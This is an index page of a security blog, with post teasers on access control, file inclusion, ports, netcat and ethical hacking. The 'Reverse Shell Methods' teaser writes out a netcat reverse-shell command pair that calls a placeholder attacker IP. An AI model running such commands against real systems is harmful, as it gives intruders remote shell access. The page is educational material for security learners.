RatSec

RatSec Blog

Broken Access Control(BAC)

- Posted in Uncategorized by

Introduction This vulnerability type involves a lot of logic and in it's most basic form it might not as you can see in the screenshot above but then again that situation almost never happens in real

Reverse Shell Methods

- Posted in Uncategorized by

Using Netcat Netcat Simple Shell: On the attacker's machine: nc -lvp 4444 On the target machine: nc <attacker_IP> 4444 -e /bin/bash Netcat with mkfifo: On the attacker's machine: nc -lvp 4444
The top 25 ways an ethical hacker can use AI in their day-to-day work

The top 25 ways an ethical hacker can use AI in their day-to-day work

- Posted in tools by

In today's rapidly evolving digital landscape, the role of ethical hackers has become more critical than ever. As cyber threats continue to grow in complexity and frequency, ethical hackers are

Linux File Permissions

- Posted in Uncategorized by

In Linux, each file and directory has an associated set of permissions and ownership attributes that determine who can access and manipulate the files and directories. These permissions are defined

Top 50 Ports & Weaknesses

- Posted in Bug bounties by

These ports represent common entry points and services used across the internet. The vulnerabilities associated with these ports can stem from outdated software, poor configurations, weak passwords,

File Inclusion

- Posted in Bug bounties by

Introduction Define LFI and RFI: LFI (Local File Inclusion): A vulnerability that allows attackers to include files from the local server. RFI (Remote File Inclusion): A vulnerability that allows

Netcat Cheat Sheet

- Posted in Uncategorized by

1. Listening Mode: nc -l -p <port> Start Netcat in listening mode on a specific port. This mode waits for incoming connections. Connect Mode: nc <host> <port> Connect to a specific

Top 100 network hacking techniques that every bug bounty hunter should be familiar with

- Posted in Uncategorized by

Vulnerability Scanning Packet Sniffing Man-in-the-Middle Attacks (MitM) DNS Spoofing ARP Spoofing SSL/TLS Hijacking Session Hijacking IP Spoofing MAC Address Spoofing SMTP Relay Exploits Firewall